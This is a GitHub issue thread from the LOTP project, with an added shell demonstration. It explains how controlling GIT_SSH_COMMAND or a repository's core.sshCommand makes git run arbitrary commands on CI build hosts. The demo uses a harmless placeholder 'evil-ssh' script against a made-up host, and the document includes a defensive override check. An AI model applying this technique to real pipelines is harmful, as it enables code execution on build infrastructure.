Open sysophost opened 9 months ago
@sysophost that's absolutely correct and there is another PR open now https://github.com/boostsecurityio/lotp/pull/15
The reason I'm not jumping to include it is because the scenario you are describing is not well aligned with all the others I've been focusing on so far. You are 100% right that if the attacker controls those, there is RCE, but it's very unlikely in an average GitHub Actions workflow for instance. The example given in the PR ^ is via a file, so that is a bit more likely, but still, GitHub does not allow pushing `.git/config`, so you cannot have that unless in the workflow you explicitly copy a template from the repo over to `.git/config`, which I've seen in practice, so I'm willing to accept that PR more or less as proposed.
Description of the LOTP tool
`git` is often present in CI pipelines where repos are pulled in at build time. Being able to control `GIT_SSH` or `GIT_SSH_COMMAND` in the pipeline environment variables could result in code execution on build hosts where direct access to the host isn't possible. Ref
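The following is an added demonstration, not code from the LOTP project, the PR, or either participant. It exercises both paths raised in this thread: `GIT_SSH_COMMAND` set in the environment (the issue description) and `core.sshCommand` written into a repository's `.git/config` (the file-based variant from the maintainer's comment). A throwaway "ssh" script records that git invoked it and then exits, so git aborts before any network access; the hostname `build-host.invalid` and the script name `evil-ssh` are made up for the example. It assumes a POSIX shell and a `git` (2.10 or newer, for `core.sshCommand`) on the path. A second function shows the check a pipeline can run over a checkout to see whether any such override is in effect.

```shell
#!/bin/sh
# Added demonstration, not code from the LOTP project or the thread's authors.
# Path 1: git honours GIT_SSH_COMMAND from the environment.
# Path 2: git honours core.sshCommand from the repository's own .git/config.
# "build-host.invalid" is a made-up remote; the fake ssh exits before any
# connection is attempted, so the demo runs fully offline.
set -eu

demo_git_ssh_command() {
  work=$(mktemp -d)
  marker="$work/ran"

  # Hypothetical attacker-controlled "ssh": records its argv, then fails so git
  # gives up at once. Unquoted EOF lets $marker expand now; \$* expands at run time.
  cat > "$work/evil-ssh" <<EOF
#!/bin/sh
echo "argv: \$*" > "$marker"
exit 1
EOF
  chmod +x "$work/evil-ssh"

  # Path 1: GIT_SSH_COMMAND in the environment, e.g. from a workflow env: block.
  # Any ssh:// operation (ls-remote, fetch, clone, push) spawns the command.
  GIT_SSH_COMMAND="$work/evil-ssh" \
    git ls-remote ssh://git@build-host.invalid/org/repo.git >/dev/null 2>&1 || true
  env_hit=$( [ -f "$marker" ] && echo yes || echo no )
  rm -f "$marker"

  # Path 2: core.sshCommand inside .git/config, no environment variable involved.
  # This is what a template copied over .git/config in a workflow would deliver.
  git init -q "$work/repo"
  git -C "$work/repo" config core.sshCommand "$work/evil-ssh"
  git -C "$work/repo" ls-remote ssh://git@build-host.invalid/org/repo.git >/dev/null 2>&1 || true
  cfg_hit=$( [ -f "$marker" ] && echo yes || echo no )

  rm -rf "$work"
  echo "env:$env_hit config:$cfg_hit"
}

# Defensive check for a pipeline: report where an ssh command override comes
# from before trusting a checkout. Environment variables take precedence over
# core.sshCommand in git itself, so they are checked first. Prints "none" if
# nothing overrides the ssh binary.
ssh_command_override_source() {
  repo=$1
  if [ -n "${GIT_SSH_COMMAND:-}" ]; then
    echo "env:GIT_SSH_COMMAND"
  elif [ -n "${GIT_SSH:-}" ]; then
    echo "env:GIT_SSH"
  else
    # --show-origin prints "<origin><TAB><value>"; keep only the origin.
    origin=$(git -C "$repo" config --show-origin --get core.sshCommand 2>/dev/null | cut -f1)
    if [ -n "$origin" ]; then
      echo "config:$origin"
    else
      echo "none"
    fi
  fi
}

demo_git_ssh_command
```

Running the block prints `env:yes config:yes`: in both cases git executed the fake "ssh" even though the remote host does not exist, which is the point of the issue. The marker file also captures the argv git hands to the command (`git@build-host.invalid git-upload-pack '/org/repo.git'`), showing that whatever sits in `GIT_SSH_COMMAND` or `core.sshCommand` runs with the build job's privileges. `ssh_command_override_source` is the corresponding check: run it against the workspace after checkout and fail the job if the answer is anything other than `none` and the override was not set by the pipeline itself.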